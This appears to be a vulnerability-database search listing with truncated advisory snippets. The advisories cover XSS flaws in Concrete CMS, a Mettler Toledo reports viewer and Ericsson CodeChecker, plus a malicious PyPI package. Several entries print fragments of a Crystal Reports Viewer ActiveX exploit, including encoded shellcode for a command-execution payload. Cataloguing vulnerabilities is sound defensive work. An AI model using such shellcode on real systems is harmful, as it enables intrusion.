CVE-2026-8245

Concrete CMS 9.5.0 and below is vulnerable to Reflected XSS in Legacy Pagination via HTML attribute injection. Concrete\Core\Legacy\Pagination builds pagination links by raw-interpolating its $URL field into href="" . Any authenticated admin or report viewer with access to...

EUVD-2022-0591

Malicious code in bioql PyPI...

CVE-2025-43952

A cross-site scripting reflected XSS vulnerability was found in Mettler Toledo FreeWeight.Net Web Reports Viewer 8.4.0 440. It allows an attacker to inject malicious scripts via the IWSessionID parameter...

CVE-2025-43952

A cross-site scripting reflected XSS vulnerability was found in Mettler Toledo FreeWeight.Net Web Reports Viewer 8.4.0 440. It allows an attacker to inject malicious scripts via the IWSessionID parameter...

CVE-2025-43952

The CVE-2025-43952 entry applies to Mettler Toledo FreeWeight.Net Web Reports Viewer 8.4.0 (440). The vulnerability is a reflected cross-site scripting (XSS) flaw that allows an attacker to inject malicious scripts via the IW_SessionID_ parameter, potentially affecting users who interact with the...

PT-2025-17584 · Mettler Toledo · Mettler Toledo Freeweight.Net Web Reports Viewer

Name of the Vulnerable Software and Affected Versions: Mettler Toledo FreeWeight.Net Web Reports Viewer version 8.4.0 440 Description: A cross-site scripting reflected XSS issue was found, allowing an attacker to inject malicious scripts via the IW SessionID parameter. This enables the execution ...

PYSEC-2022-43181

In Ericsson CodeChecker through 6.18.0, a Stored Cross-site scripting XSS vulnerability in the comments component of the reports viewer allows remote attackers to inject arbitrary web script or HTML via the POST JSON data of the /CodeCheckerService API...

Cross site scripting

In Ericsson CodeChecker through 6.18.0, a Stored Cross-site scripting XSS vulnerability in the comments component of the reports viewer allows remote attackers to inject arbitrary web script or HTML via the POST JSON data of the /CodeCheckerService API...

Crystal Reports Viewer 12.0.0.549 - Activex Exploit (PrintControl.dll) 0day

No description provided by source. !-- Crystal Reports Viewer 12.0.0.549 Activex Exploit PrintControl.dll 0-day By = DrIDE File = C:\Program Files\BusinessObjects\Common\4.0\crystalreportviewers12\ActiveXControls\PrintControl.dll method = ServerResourceVersion progid =...

Crystal Reports Viewer 12.0.0.549 - PrintControl.dll ActiveX

Crystal Reports Viewer 12.0.0.549 - PrintControl.dll ActiveX //payload is windows/exec cmd=calc.exe shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+...

Crystal Reports Viewer 12.0.0.549 Activex Exploit (PrintControl.dll)

Exploit for windows platform in category remote exploits ==================================================================== Crystal Reports Viewer 12.0.0.549 Activex Exploit PrintControl.dll ==================================================================== //payload is windows/exec...

Crystal Reports Viewer 12.0.0.549 - 'PrintControl.dll' ActiveX

//payload is windows/exec cmd=calc.exe shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+...

Crystal Reports Viewer 12.0.0.549 Active-X Exploit

//payload is windows/exec cmd=calc.exe shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+...